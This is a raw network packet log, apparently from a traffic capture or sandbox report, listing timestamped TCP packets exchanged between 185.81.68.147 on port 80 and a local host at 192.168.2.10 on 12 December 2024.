                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.129957914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.131017923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.131023884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.131081104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.131196976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.131994009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.132083893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.132226944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.133019924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.133390903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.134006023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.134119034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.134180069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.135021925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.135047913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.135150909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.136065006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.136157036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.136480093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.137028933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.137178898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.137276888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.138114929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.138340950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.138442039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.139107943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.139231920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.139327049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.140146017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.140265942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.140718937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.141133070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.141942978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.142050028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.142184019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.142190933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.142342091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.143147945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.143276930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.143397093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.144167900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.144402027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.145209074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.145215034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.145298004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.146178961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.146581888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.146693945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.147197008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.147635937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.147725105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.148205042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.148332119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.149245977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.149354935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.149538040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.150298119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.150302887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.150394917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.151276112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.151362896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.151449919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.152483940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.153027058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.153110027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.153368950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.154318094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.154323101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.154408932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.154484987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.155356884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.155458927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.155482054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.155719995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.156317949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.156564951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.157325983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.157387972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.157499075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.157589912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.158421993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.158493996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.158596992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.159413099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.159420013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.159586906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.160548925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.160725117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.160928965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.161429882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.161952972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.162051916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.162472010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.162477970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.162590981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.163430929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.163729906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.164186954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.164452076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303571939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303580999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303731918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303787947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303850889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.303885937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.304789066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.304902077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.305108070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.305839062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.305942059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.305947065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.306814909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.307697058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.307835102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.307842016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.307940960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.307952881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.308917046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.309166908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.309263945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.309849977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.309921026 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.310556889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.310867071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.310904980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.310971022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.311898947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.312927961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.312963963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.312972069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.313031912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.313061953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.313903093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.313971043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.314990044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.314996958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.315004110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.315076113 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.316056013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.316137075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.316143990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.316991091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.316999912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.317097902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.318033934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.318252087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.318455935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.318969965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.319103956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.319360018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.320008993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.320390940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.320487022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.321017027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.321300030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.321412086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.322036982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.322120905 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.323107958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.323112965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.323118925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.323213100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.324104071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.324146986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.324263096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.325052977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.325154066 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.325752974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.326113939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.326121092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.326214075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.327259064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.327265978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.327377081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.328092098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.328315020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.328933001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.329137087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.329142094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.329185963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.330199003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.330271006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.330364943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.331274986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.331368923 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.331412077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.332185984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.332262039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.332278967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.333276033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.333375931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.333406925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.334347010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.334431887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.334780931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.335347891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.335405111 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.335839033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.336272001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.336328983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.337428093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.337435007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.337441921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.337529898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.338296890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.338399887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.338457108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.339325905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.339385033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.339930058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.340320110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.340327024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.340432882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.341320992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.341401100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.342350960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.342358112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.342391968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.342433929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.343362093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.343432903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.343476057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.344486952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.344578981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.345489979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.345496893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.345530033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.345634937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.346401930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.346522093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.346597910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.347433090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.347695112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.348063946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.348567963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.348573923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.348664999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.349438906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.349631071 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.350474119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.350481033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.350511074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.350565910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.351464033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.351526022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.351619005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.352498055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.352566957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.352869987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.353472948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.353602886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.353904963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.354528904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.354639053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.355325937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.355516911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.355643034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.355722904 CET4994680192.168.2.10185.81.68.147
